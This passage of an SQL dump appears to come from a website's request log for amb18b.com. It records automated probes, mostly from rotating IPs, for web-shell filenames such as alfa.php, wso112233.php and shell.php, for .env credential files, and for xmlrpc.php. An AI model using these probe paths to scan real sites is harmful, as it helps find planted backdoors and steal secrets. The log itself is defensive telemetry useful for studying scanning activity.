19:28:35','2025-11-21 19:28:35'),(9020,'https://amb18b.com/wp-trackback.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:36','2025-11-21 19:28:36'),(9021,'https://amb18b.com/text.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:37','2025-11-21 19:28:37'),(9022,'https://amb18b.com/as.php','20.37.101.92','Direct Access',2,'2025-11-21 19:29:41','2025-11-21 19:28:38'),(9023,'https://amb18b.com/404.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:40','2025-11-21 19:28:40'),(9024,'https://amb18b.com/link.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:41','2025-11-21 19:28:41'),(9025,'https://amb18b.com/makeasmtp.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:42','2025-11-21 19:28:42'),(9026,'https://amb18b.com/file.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:44','2025-11-21 19:28:44'),(9027,'https://amb18b.com/test.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:46','2025-11-21 19:28:46'),(9028,'https://amb18b.com/chosen.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:47','2025-11-21 19:28:47'),(9029,'https://amb18b.com/files/css_compare.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:48','2025-11-21 19:28:48'),(9030,'https://amb18b.com/wp.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:49','2025-11-21 19:28:49'),(9031,'https://amb18b.com/uana.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:50','2025-11-21 19:28:50'),(9032,'https://amb18b.com/duck.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:51','2025-11-21 19:28:51'),(9033,'https://amb18b.com/lock360.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:52','2025-11-21 19:28:52'),(9034,'https://amb18b.com/a.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:54','2025-11-21 19:28:54'),(9035,'https://amb18b.com/api.php','20.37.101.92','Direct Access',2,'2025-11-21 19:29:22','2025-11-21 19:28:55'),(9036,'https://amb18b.com/inc.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:56','2025-11-21 19:28:56'),(9037,'https://amb18b.com/siteheads.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:57','2025-11-21 19:28:57'),(9038,'https://amb18b.com/atomlib.php','20.37.101.92','Direct Access',1,'2025-11-21 19:28:58','2025-11-21 19:28:58'),(9039,'https://amb18b.com/adminfuns.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:00','2025-11-21 19:29:00'),(9040,'https://amb18b.com/ioxi-rex4.php7','20.37.101.92','Direct Access',1,'2025-11-21 19:29:03','2025-11-21 19:29:03'),(9041,'https://amb18b.com/moon.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:04','2025-11-21 19:29:04'),(9042,'https://amb18b.com/wp-info.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:05','2025-11-21 19:29:05'),(9043,'https://amb18b.com/warm.PhP7','20.37.101.92','Direct Access',1,'2025-11-21 19:29:07','2025-11-21 19:29:07'),(9044,'https://amb18b.com/ws.php7','20.37.101.92','Direct Access',1,'2025-11-21 19:29:08','2025-11-21 19:29:08'),(9045,'https://amb18b.com/rss.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:09','2025-11-21 19:29:09'),(9046,'https://amb18b.com/pekok.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:10','2025-11-21 19:29:10'),(9047,'https://amb18b.com/elp.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:11','2025-11-21 19:29:11'),(9048,'https://amb18b.com/wp-aa.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:12','2025-11-21 19:29:12'),(9049,'https://amb18b.com/cart.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:14','2025-11-21 19:29:14'),(9050,'https://amb18b.com/categories.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:15','2025-11-21 19:29:15'),(9051,'https://amb18b.com/compare.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:16','2025-11-21 19:29:16'),(9052,'https://amb18b.com/refund.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:17','2025-11-21 19:29:17'),(9053,'https://amb18b.com/shop.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:18','2025-11-21 19:29:18'),(9054,'https://amb18b.com/wishlist.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:19','2025-11-21 19:29:19'),(9055,'https://amb18b.com/results.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:21','2025-11-21 19:29:21'),(9056,'https://amb18b.com/222.php?p=','20.37.101.92','Direct Access',1,'2025-11-21 19:29:24','2025-11-21 19:29:24'),(9057,'https://amb18b.com/atom.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:25','2025-11-21 19:29:25'),(9058,'https://amb18b.com/case.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:27','2025-11-21 19:29:27'),(9059,'https://amb18b.com/docs.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:28','2025-11-21 19:29:28'),(9060,'https://amb18b.com/ios.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:29','2025-11-21 19:29:29'),(9061,'https://amb18b.com/click.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:30','2025-11-21 19:29:30'),(9062,'https://amb18b.com/lv.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:31','2025-11-21 19:29:31'),(9063,'https://amb18b.com/inputs.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:32','2025-11-21 19:29:32'),(9064,'https://amb18b.com/alfa.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:34','2025-11-21 19:29:34'),(9065,'https://amb18b.com/byp.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:35','2025-11-21 19:29:35'),(9066,'https://amb18b.com/goat1.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:36','2025-11-21 19:29:36'),(9067,'https://amb18b.com/f.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:37','2025-11-21 19:29:37'),(9068,'https://amb18b.com/max.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:38','2025-11-21 19:29:38'),(9069,'https://amb18b.com/m.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:40','2025-11-21 19:29:40'),(9070,'https://amb18b.com/v.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:42','2025-11-21 19:29:42'),(9071,'https://amb18b.com/vv.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:45','2025-11-21 19:29:45'),(9072,'https://amb18b.com/0.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:46','2025-11-21 19:29:46'),(9073,'https://amb18b.com/jp.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:48','2025-11-21 19:29:48'),(9074,'https://amb18b.com/2.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:49','2025-11-21 19:29:49'),(9075,'https://amb18b.com/goods.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:50','2025-11-21 19:29:50'),(9076,'https://amb18b.com/manager.php?p=','20.37.101.92','Direct Access',1,'2025-11-21 19:29:51','2025-11-21 19:29:51'),(9077,'https://amb18b.com/new.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:52','2025-11-21 19:29:52'),(9078,'https://amb18b.com/info.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:54','2025-11-21 19:29:54'),(9079,'https://amb18b.com/doc.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:55','2025-11-21 19:29:55'),(9080,'https://amb18b.com/go.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:56','2025-11-21 19:29:56'),(9081,'https://amb18b.com/el.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:58','2025-11-21 19:29:58'),(9082,'https://amb18b.com/mail.php','20.37.101.92','Direct Access',1,'2025-11-21 19:29:59','2025-11-21 19:29:59'),(9083,'https://amb18b.com/11.php','20.37.101.92','Direct Access',1,'2025-11-21 19:30:01','2025-11-21 19:30:01'),(9084,'https://amb18b.com/conflg.php?p=','20.37.101.92','Direct Access',1,'2025-11-21 19:30:02','2025-11-21 19:30:02'),(9085,'https://amb18b.com/xmrlpc.php?p=','20.37.101.92','Direct Access',1,'2025-11-21 19:30:03','2025-11-21 19:30:03'),(9086,'https://amb18b.com/xmlrpc.php','162.0.208.67','Direct Access',1,'2025-11-21 20:04:22','2025-11-21 20:04:22'),(9087,'https://amb18b.com/laravel/.env','116.197.130.58','Direct Access',1,'2025-11-21 20:16:23','2025-11-21 20:16:23'),(9088,'https://amb18b.com/.env','116.197.130.58','Direct Access',1,'2025-11-21 20:16:23','2025-11-21 20:16:23'),(9089,'https://amb18b.com/core/.env','116.197.130.58','Direct Access',1,'2025-11-21 20:16:23','2025-11-21 20:16:23'),(9090,'https://amb18b.com/xmlrpc.php','184.168.126.97','Direct Access',1,'2025-11-21 20:48:42','2025-11-21 20:48:42'),(9091,'https://amb18b.com/aa.php','91.221.130.159','https://www.google.fr/',1,'2025-11-21 21:30:49','2025-11-21 21:30:49'),(9092,'https://amb18b.com/abcd.php','137.195.18.60','https://www.google.fr/',1,'2025-11-21 21:30:54','2025-11-21 21:30:54'),(9093,'https://amb18b.com/admin.php','127.161.252.184','https://www.yahoo.com/',1,'2025-11-21 21:30:56','2025-11-21 21:30:56'),(9094,'https://amb18b.com/.__info.php','189.106.208.74','https://www.google.com/',1,'2025-11-21 21:30:58','2025-11-21 21:30:58'),(9095,'https://amb18b.com/info.php','72.247.137.114','https://www.yahoo.com/',1,'2025-11-21 21:31:00','2025-11-21 21:31:00'),(9096,'https://amb18b.com/xmlrpc.php','206.8.1.102','https://www.google.com/',1,'2025-11-21 21:31:01','2025-11-21 21:31:01'),(9097,'https://amb18b.com/ALFA_DATA/admin.php','76.199.56.201','https://duckduckgo.com/',1,'2025-11-21 21:31:03','2025-11-21 21:31:03'),(9098,'https://amb18b.com/aaa.php','189.70.118.175','https://www.bing.com/',1,'2025-11-21 21:31:05','2025-11-21 21:31:05'),(9099,'https://amb18b.com/about.php','69.237.203.221','https://duckduckgo.com/',1,'2025-11-21 21:31:07','2025-11-21 21:31:07'),(9100,'https://amb18b.com/admin/admin.php','233.41.33.136','https://www.google.com/',1,'2025-11-21 21:31:09','2025-11-21 21:31:09'),(9101,'https://amb18b.com/adminfuns.php','103.63.122.131','https://duckduckgo.com/',1,'2025-11-21 21:31:11','2025-11-21 21:31:11'),(9102,'https://amb18b.com/akcc.php','131.22.49.88','https://www.bing.com/',1,'2025-11-21 21:31:12','2025-11-21 21:31:12'),(9103,'https://amb18b.com/alfa.php','45.70.213.209','https://duckduckgo.com/',1,'2025-11-21 21:31:14','2025-11-21 21:31:14'),(9104,'https://amb18b.com/build.php','28.189.46.42','https://www.google.com/',1,'2025-11-21 21:31:16','2025-11-21 21:31:16'),(9105,'https://amb18b.com/buy.php','29.39.20.92','https://www.google.com/',1,'2025-11-21 21:31:19','2025-11-21 21:31:19'),(9106,'https://amb18b.com/chosen.php','244.77.101.124','https://www.google.com/',1,'2025-11-21 21:31:20','2025-11-21 21:31:20'),(9107,'https://amb18b.com/classwithtostring.php','52.163.5.103','https://www.google.com/',1,'2025-11-21 21:31:22','2025-11-21 21:31:22'),(9108,'https://amb18b.com/default.php','127.113.174.149','https://www.bing.com/',1,'2025-11-21 21:31:24','2025-11-21 21:31:24'),(9109,'https://amb18b.com/edit.php','217.200.35.137','https://www.bing.com/',1,'2025-11-21 21:31:26','2025-11-21 21:31:26'),(9110,'https://amb18b.com/file.php','251.237.217.59','https://www.google.com/',1,'2025-11-21 21:31:28','2025-11-21 21:31:28'),(9111,'https://amb18b.com/filemanager.php','217.188.198.224','https://www.google.co.uk/',1,'2025-11-21 21:31:30','2025-11-21 21:31:30'),(9112,'https://amb18b.com/flower.php','251.99.51.41','https://www.bing.com/',1,'2025-11-21 21:31:32','2025-11-21 21:31:32'),(9113,'https://amb18b.com/function/function.php','254.204.137.41','https://www.google.de/',1,'2025-11-21 21:31:34','2025-11-21 21:31:34'),(9114,'https://amb18b.com/images/index.php','49.250.187.239','https://www.yahoo.com/',1,'2025-11-21 21:31:36','2025-11-21 21:31:36'),(9115,'https://amb18b.com/images/images/about.php','157.176.180.103','https://www.google.co.uk/',1,'2025-11-21 21:31:38','2025-11-21 21:31:38'),(9116,'https://amb18b.com/ioxi-o.php','83.185.251.182','https://www.google.co.uk/',1,'2025-11-21 21:31:39','2025-11-21 21:31:39'),(9117,'https://amb18b.com/mari.php','230.132.238.105','https://www.google.com/',1,'2025-11-21 21:31:41','2025-11-21 21:31:41'),(9118,'https://amb18b.com/moon.php','243.236.6.188','https://duckduckgo.com/',1,'2025-11-21 21:31:43','2025-11-21 21:31:43'),(9119,'https://amb18b.com/nc4.php','189.83.138.172','https://www.google.co.uk/',1,'2025-11-21 21:31:45','2025-11-21 21:31:45'),(9120,'https://amb18b.com/wp-admin/css/colors/blue/index.php','42.142.64.102','https://www.google.com/',1,'2025-11-21 21:31:49','2025-11-21 21:31:49'),(9121,'https://amb18b.com/wp-includes/style-engine/index.php','222.87.32.102','https://www.google.com/',1,'2025-11-21 21:31:55','2025-11-21 21:31:55'),(9122,'https://amb18b.com/cgi-bin/','113.10.246.202','https://www.bing.com/',1,'2025-11-21 21:31:56','2025-11-21 21:31:56'),(9123,'https://amb18b.com/xleet.php','20.150.81.99','https://www.yahoo.com/',1,'2025-11-21 21:31:58','2025-11-21 21:31:58'),(9124,'https://amb18b.com/wp-admin/includes/','47.175.41.101','https://duckduckgo.com/',1,'2025-11-21 21:32:00','2025-11-21 21:32:00'),(9125,'https://amb18b.com/wp-good.php','38.213.102.179','https://www.google.de/',1,'2025-11-21 21:32:03','2025-11-21 21:32:03'),(9126,'https://amb18b.com/wp-includes/Text/Diff/Renderer/','36.165.47.48','https://www.bing.com/',1,'2025-11-21 21:32:05','2025-11-21 21:32:05'),(9127,'https://amb18b.com/wp-includes/style-engine/','60.184.225.28','https://www.google.com/',1,'2025-11-21 21:32:07','2025-11-21 21:32:07'),(9128,'https://amb18b.com/xmrlpc.php','20.158.82.190','https://www.google.de/',1,'2025-11-21 21:32:09','2025-11-21 21:32:09'),(9129,'https://amb18b.com/asasx.php','26.147.225.191','https://duckduckgo.com/',1,'2025-11-21 21:32:11','2025-11-21 21:32:11'),(9130,'https://amb18b.com/autoload_classmap.php','157.11.217.152','https://www.google.co.uk/',1,'2025-11-21 21:32:13','2025-11-21 21:32:13'),(9131,'https://amb18b.com/cong.php','113.143.183.91','https://www.bing.com/',1,'2025-11-21 21:32:15','2025-11-21 21:32:15'),(9132,'https://amb18b.com/file2.php','58.61.236.110','https://www.yahoo.com/',1,'2025-11-21 21:32:17','2025-11-21 21:32:17'),(9133,'https://amb18b.com/wp-includes/IXR/','122.231.21.215','https://www.yahoo.com/',1,'2025-11-21 21:32:27','2025-11-21 21:32:27'),(9134,'https://amb18b.com/wp-includes/block-supports/','119.170.235.175','https://www.google.de/',1,'2025-11-21 21:32:29','2025-11-21 21:32:29'),(9135,'https://amb18b.com/wp-includes/fonts/','22.120.206.6','https://www.google.co.uk/',1,'2025-11-21 21:32:30','2025-11-21 21:32:30'),(9136,'https://amb18b.com/wp-includes/fonts/index.php','113.40.84.37','https://www.google.co.uk/',1,'2025-11-21 21:32:32','2025-11-21 21:32:32'),(9137,'https://amb18b.com/wp-includes/js/crop/','223.66.141.89','https://www.bing.com/',1,'2025-11-21 21:32:34','2025-11-21 21:32:34'),(9138,'https://amb18b.com/wp-includes/rest-api/','227.190.206.33','https://www.google.com/',1,'2025-11-21 21:32:36','2025-11-21 21:32:36'),(9139,'https://amb18b.com/wp-includes/widgets/','179.229.99.207','https://www.bing.com/',1,'2025-11-21 21:32:38','2025-11-21 21:32:38'),(9140,'https://amb18b.com/ds.php','143.79.139.153','https://www.google.co.uk/',1,'2025-11-21 21:32:39','2025-11-21 21:32:39'),(9141,'https://amb18b.com/f5.php','74.57.146.219','https://duckduckgo.com/',1,'2025-11-21 21:32:41','2025-11-21 21:32:41'),(9142,'https://amb18b.com/god4m.php','179.21.165.123','https://www.yahoo.com/',1,'2025-11-21 21:32:43','2025-11-21 21:32:43'),(9143,'https://amb18b.com/test1.php','255.194.150.118','https://www.google.co.uk/',1,'2025-11-21 21:32:46','2025-11-21 21:32:46'),(9144,'https://amb18b.com/uploads/','51.252.147.26','https://www.google.com/',1,'2025-11-21 21:32:47','2025-11-21 21:32:47'),(9145,'https://amb18b.com/0.php','21.9.160.51','https://www.google.co.uk/',1,'2025-11-21 21:32:50','2025-11-21 21:32:50'),(9146,'https://amb18b.com/07.php','42.59.57.206','https://www.google.fr/',1,'2025-11-21 21:32:52','2025-11-21 21:32:52'),(9147,'https://amb18b.com/dropdown.php','67.218.26.74','https://www.bing.com/',1,'2025-11-21 21:32:54','2025-11-21 21:32:54'),(9148,'https://amb18b.com/makeasmtp.php','197.53.103.1','https://www.google.fr/',1,'2025-11-21 21:32:56','2025-11-21 21:32:56'),(9149,'https://amb18b.com/wp-sigunq.php','172.6.206.162','https://www.bing.com/',1,'2025-11-21 21:32:58','2025-11-21 21:32:58'),(9150,'https://amb18b.com/wso112233.php','206.124.67.171','https://www.google.fr/',1,'2025-11-21 21:33:00','2025-11-21 21:33:00'),(9151,'https://amb18b.com/alfanew.php','171.23.176.214','https://duckduckgo.com/',1,'2025-11-21 21:33:02','2025-11-21 21:33:02'),(9152,'https://amb18b.com/fw.php','30.246.16.135','https://www.yahoo.com/',1,'2025-11-21 21:33:04','2025-11-21 21:33:04'),(9153,'https://amb18b.com/install.php','142.198.167.157','https://www.google.fr/',1,'2025-11-21 21:33:06','2025-11-21 21:33:06'),(9154,'https://amb18b.com/simple.php','186.8.151.69','https://www.yahoo.com/',1,'2025-11-21 21:33:10','2025-11-21 21:33:10'),(9155,'https://amb18b.com/inputs.php','142.209.223.89','https://www.google.com/',1,'2025-11-21 21:33:12','2025-11-21 21:33:12'),(9156,'https://amb18b.com/classsmtps.php','61.121.243.102','https://www.bing.com/',1,'2025-11-21 21:33:13','2025-11-21 21:33:13'),(9157,'https://amb18b.com/wp-blog-header.php','158.185.162.163','https://www.google.com/',1,'2025-11-21 21:33:15','2025-11-21 21:33:15'),(9158,'https://amb18b.com/wp-trackback.php','229.204.16.75','https://www.google.de/',1,'2025-11-21 21:33:17','2025-11-21 21:33:17'),(9159,'https://amb18b.com/wp-signup.php','212.181.100.248','https://www.google.fr/',1,'2025-11-21 21:33:19','2025-11-21 21:33:19'),(9160,'https://amb18b.com/plugins.php','101.42.160.95','https://www.google.com/',1,'2025-11-21 21:33:24','2025-11-21 21:33:24'),(9161,'https://amb18b.com/post.php','194.130.116.91','https://www.google.de/',1,'2025-11-21 21:33:26','2025-11-21 21:33:26'),(9162,'https://amb18b.com/wp-2019.php','174.84.146.176','https://www.google.com/',1,'2025-11-21 21:33:28','2025-11-21 21:33:28'),(9163,'https://amb18b.com/geju.php','171.108.2.136','https://www.google.fr/',1,'2025-11-21 21:33:30','2025-11-21 21:33:30'),(9164,'https://amb18b.com/wp.php','163.25.252.63','https://duckduckgo.com/',1,'2025-11-21 21:33:42','2025-11-21 21:33:42'),(9165,'https://amb18b.com/hoot.php','95.124.217.167','https://www.google.co.uk/',1,'2025-11-21 21:33:44','2025-11-21 21:33:44'),(9166,'https://amb18b.com/css.php','162.25.77.74','https://www.google.com/',1,'2025-11-21 21:33:46','2025-11-21 21:33:46'),(9167,'https://amb18b.com/log.php','135.50.138.225','https://www.google.co.uk/',1,'2025-11-21 21:33:49','2025-11-21 21:33:49'),(9168,'https://amb18b.com/mail.php','207.214.230.6','https://www.google.de/',1,'2025-11-21 21:33:50','2025-11-21 21:33:50'),(9169,'https://amb18b.com/bak.php','58.195.184.219','https://duckduckgo.com/',1,'2025-11-21 21:33:52','2025-11-21 21:33:52'),(9170,'https://amb18b.com/content.php','142.96.239.77','https://www.google.com/',1,'2025-11-21 21:33:54','2025-11-21 21:33:54'),(9171,'https://amb18b.com/upfile.php','236.45.99.194','https://www.bing.com/',1,'2025-11-21 21:33:56','2025-11-21 21:33:56'),(9172,'https://amb18b.com/wp-conflg.php','124.251.2.36','https://www.google.de/',1,'2025-11-21 21:33:58','2025-11-21 21:33:58'),(9173,'https://amb18b.com/bypass.php','249.89.21.237','https://www.google.fr/',1,'2025-11-21 21:34:00','2025-11-21 21:34:00'),(9174,'https://amb18b.com/404.php','152.213.12.60','https://www.yahoo.com/',1,'2025-11-21 21:34:02','2025-11-21 21:34:02'),(9175,'https://amb18b.com/updates.php','34.137.31.153','https://www.google.co.uk/',1,'2025-11-21 21:34:04','2025-11-21 21:34:04'),(9176,'https://amb18b.com/radio.php','168.151.87.44','https://www.google.fr/',1,'2025-11-21 21:34:06','2025-11-21 21:34:06'),(9177,'https://amb18b.com/ae.php','129.222.82.225','https://duckduckgo.com/',1,'2025-11-21 21:34:07','2025-11-21 21:34:07'),(9178,'https://amb18b.com/blog.php','85.234.34.216','https://www.google.com/',1,'2025-11-21 21:34:09','2025-11-21 21:34:09'),(9179,'https://amb18b.com/themes.php','217.99.31.51','https://www.google.com/',1,'2025-11-21 21:34:11','2025-11-21 21:34:11'),(9180,'https://amb18b.com/ini.php','197.45.215.245','https://www.google.co.uk/',1,'2025-11-21 21:34:13','2025-11-21 21:34:13'),(9181,'https://amb18b.com/as.php','81.47.244.62','https://www.google.co.uk/',1,'2025-11-21 21:34:15','2025-11-21 21:34:15'),(9182,'https://amb18b.com/shell.php','237.17.92.229','https://www.bing.com/',1,'2025-11-21 21:34:17','2025-11-21 21:34:17'),(9183,'https://amb18b.com/ws.php','246.82.125.225','https://www.bing.com/',1,'2025-11-21 21:34:18','2025-11-21 21:34:18'),(9184,'https://amb18b.com/1.php','200.138.99.34','https://www.bing.com/',1,'2025-11-21 21:34:20','2025-11-21 21:34:20'),(9185,'https://amb18b.com/123.php','163.55.205.171','https://www.google.de/',1,'2025-11-21 21:34:22','2025-11-21 21:34:22'),(9186,'https://amb18b.com/9.php','80.128.71.179','https://www.google.com/',1,'2025-11-21 21:34:24','2025-11-21 21:34:24'),(9187,'https://amb18b.com/admin-ajax.php','138.81.105.235','https://www.yahoo.com/',1,'2025-11-21 21:34:25','2025-11-21 21:34:25'),(9188,'https://amb18b.com/akc.php','37.247.126.99','https://www.yahoo.com/',1,'2025-11-21 21:34:27','2025-11-21 21:34:27'),(9189,'https://amb18b.com/asd.php','107.40.7.253','https://www.yahoo.com/',1,'2025-11-21 21:34:29','2025-11-21 21:34:29'),(9190,'https://amb18b.com/atomlib.php','122.20.85.245','https://www.google.de/',1,'2025-11-21 21:34:31','2025-11-21 21:34:31'),(9191,'https://amb18b.com/axx.php','250.57.209.144','https://duckduckgo.com/',1,'2025-11-21 21:34:33','2025-11-21 21:34:33'),(9192,'https://amb18b.com/berax.php','145.102.224.237','https://www.google.fr/',1,'2025-11-21 21:34:35','2025-11-21 21:34:35'),(9193,'https://amb18b.com/checkbox.php','172.215.233.252','https://www.yahoo.com/',1,'2025-11-21 21:34:37','2025-11-21 21:34:37'),(9194,'https://amb18b.com/elp.php','107.127.110.173','https://www.bing.com/',1,'2025-11-21 21:34:39','2025-11-21 21:34:39'),(9195,'https://amb18b.com/file4.php','42.136.188.233','https://www.google.de/',1,'2025-11-21 21:34:41','2025-11-21 21:34:41'),(9196,'https://amb18b.com/form.php','127.76.56.210','https://www.google.co.uk/',1,'2025-11-21 21:34:42','2025-11-21 21:34:42'),(9197,'https://amb18b.com/gecko.php','59.192.233.160','https://www.google.co.uk/',1,'2025-11-21 21:34:44','2025-11-21 21:34:44'),(9198,'https://amb18b.com/goods.php','119.110.240.245','https://www.google.co.uk/',1,'2025-11-21 21:34:47','2025-11-21 21:34:47'),(9199,'https://amb18b.com/kyami.php','171.15.230.7','https://www.google.com/',1,'2025-11-21 21:34:49','2025-11-21 21:34:49'),(9200,'https://amb18b.com/manager.php','226.56.236.60','https://www.bing.com/',1,'2025-11-21 21:34:51','2025-11-21 21:34:51'),(9201,'https://amb18b.com/new.php','163.187.176.209','https://www.bing.com/',1,'2025-11-21 21:34:53','2025-11-21 21:34:53'),(9202,'https://amb18b.com/wp-admin.php','122.215.196.97','https://www.google.com/',1,'2025-11-21 21:34:55','2025-11-21 21:34:55'),(9203,'https://amb18b.com/xmlrpc.php','162.144.182.123','Direct Access',1,'2025-11-21 21:38:21','2025-11-21 21:38:21'),(9204,'https://amb18b.com/xmlrpc.php','103.42.117.165','Direct Access',1,'2025-11-21 22:44:21','2025-11-21 22:44:21'),(9205,'https://amb18b.com/xmlrpc.php','85.95.216.149','Direct Access',1,'2025-11-21 23:58:47','2025-11-21 23:58:47'),(9206,'https://amb18b.com/xmlrpc.php','171.244.0.91','Direct Access',1,'2025-11-22 01:20:18','2025-11-22 01:20:18'),(9207,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-22 02:49:15','2025-11-22 02:49:15'),(9208,'https://amb18b.com/style.php','4.232.179.163','Invalid Referrer',1,'2025-11-22 02:49:19','2025-11-22 02:49:19'),(9209,'https://amb18b.com/xmlrpc.php','2a02:c207:2247:9793::1','Direct Access',1,'2025-11-22 02:53:07','2025-11-22 02:53:07'),(9210,'https://amb18b.com/aa.php','52.27.255.62','https://www.google.co.uk/',1,'2025-11-22 04:07:23','2025-11-22 04:07:23'),(9211,'https://amb18b.com/abcd.php','48.170.190.111','https://www.google.de/',1,'2025-11-22 04:07:28','2025-11-22 04:07:28'),(9212,'https://amb18b.com/admin.php','125.114.80.243','https://duckduckgo.com/',1,'2025-11-22 04:07:30','2025-11-22 04:07:30'),(9213,'https://amb18b.com/.__info.php','75.49.133.119','https://www.google.com/',1,'2025-11-22 04:07:32','2025-11-22 04:07:32'),(9214,'https://amb18b.com/info.php','39.19.196.20','https://duckduckgo.com/',1,'2025-11-22 04:07:35','2025-11-22 04:07:35'),(9215,'https://amb18b.com/xmlrpc.php','201.101.97.185','https://www.bing.com/',1,'2025-11-22 04:07:37','2025-11-22 04:07:37'),(9216,'https://amb18b.com/ALFA_DATA/admin.php','91.249.6.68','https://www.bing.com/',1,'2025-11-22 04:07:39','2025-11-22 04:07:39'),(9217,'https://amb18b.com/aaa.php','40.255.3.71','https://www.google.co.uk/',1,'2025-11-22 04:07:40','2025-11-22 04:07:40'),(9218,'https://amb18b.com/about.php','72.62.239.153','https://www.bing.com/',1,'2025-11-22 04:07:42','2025-11-22 04:07:42'),(9219,'https://amb18b.com/admin/admin.php','114.228.124.54','https://www.google.fr/',1,'2025-11-22 04:07:44','2025-11-22 04:07:44'),(9220,'https://amb18b.com/adminfuns.php','71.77.13.120','https://www.yahoo.com/',1,'2025-11-22 04:07:46','2025-11-22 04:07:46'),(9221,'https://amb18b.com/akcc.php','3.88.124.132','https://www.yahoo.com/',1,'2025-11-22 04:07:48','2025-11-22 04:07:48'),(9222,'https://amb18b.com/alfa.php','28.20.117.189','https://www.yahoo.com/',1,'2025-11-22 04:07:50','2025-11-22 04:07:50'),(9223,'https://amb18b.com/build.php','37.40.252.169','https://www.bing.com/',1,'2025-11-22 04:07:51','2025-11-22 04:07:51'),(9224,'https://amb18b.com/buy.php','243.250.126.151','https://www.google.fr/',1,'2025-11-22 04:07:53','2025-11-22 04:07:53'),(9225,'https://amb18b.com/chosen.php','136.196.123.197','https://www.google.de/',1,'2025-11-22 04:07:55','2025-11-22 04:07:55'),(9226,'https://amb18b.com/classwithtostring.php','24.104.231.3','https://www.yahoo.com/',1,'2025-11-22 04:07:57','2025-11-22 04:07:57'),(9227,'https://amb18b.com/default.php','40.253.180.76','https://www.google.fr/',1,'2025-11-22 04:07:59','2025-11-22 04:07:59'),(9228,'https://amb18b.com/edit.php','186.230.219.70','https://www.yahoo.com/',1,'2025-11-22 04:08:01','2025-11-22 04:08:01'),(9229,'https://amb18b.com/file.php','27.74.59.19','https://www.bing.com/',1,'2025-11-22 04:08:03','2025-11-22 04:08:03'),(9230,'https://amb18b.com/filemanager.php','230.140.37.117','https://www.google.com/',1,'2025-11-22 04:08:05','2025-11-22 04:08:05'),(9231,'https://amb18b.com/flower.php','54.45.195.234','https://www.google.com/',1,'2025-11-22 04:08:07','2025-11-22 04:08:07'),(9232,'https://amb18b.com/function/function.php','178.128.150.131','https://www.google.fr/',1,'2025-11-22 04:08:09','2025-11-22 04:08:09'),(9233,'https://amb18b.com/images/index.php','149.136.112.77','https://www.bing.com/',1,'2025-11-22 04:08:12','2025-11-22 04:08:12'),(9234,'https://amb18b.com/images/images/about.php','22.105.86.135','https://www.google.de/',1,'2025-11-22 04:08:14','2025-11-22 04:08:14'),(9235,'https://amb18b.com/ioxi-o.php','95.68.97.139','https://duckduckgo.com/',1,'2025-11-22 04:08:18','2025-11-22 04:08:18'),(9236,'https://amb18b.com/mari.php','90.134.241.39','https://www.google.com/',1,'2025-11-22 04:08:20','2025-11-22 04:08:20'),(9237,'https://amb18b.com/moon.php','84.75.165.141','https://www.google.com/',1,'2025-11-22 04:08:22','2025-11-22 04:08:22'),(9238,'https://amb18b.com/nc4.php','220.46.64.143','https://duckduckgo.com/',1,'2025-11-22 04:08:24','2025-11-22 04:08:24'),(9239,'https://amb18b.com/wp-admin/css/colors/blue/index.php','160.140.183.68','https://www.yahoo.com/',1,'2025-11-22 04:08:28','2025-11-22 04:08:28'),(9240,'https://amb18b.com/wp-includes/style-engine/index.php','142.89.191.52','https://www.google.co.uk/',1,'2025-11-22 04:08:32','2025-11-22 04:08:32'),(9241,'https://amb18b.com/cgi-bin/','40.254.66.183','https://www.yahoo.com/',1,'2025-11-22 04:08:35','2025-11-22 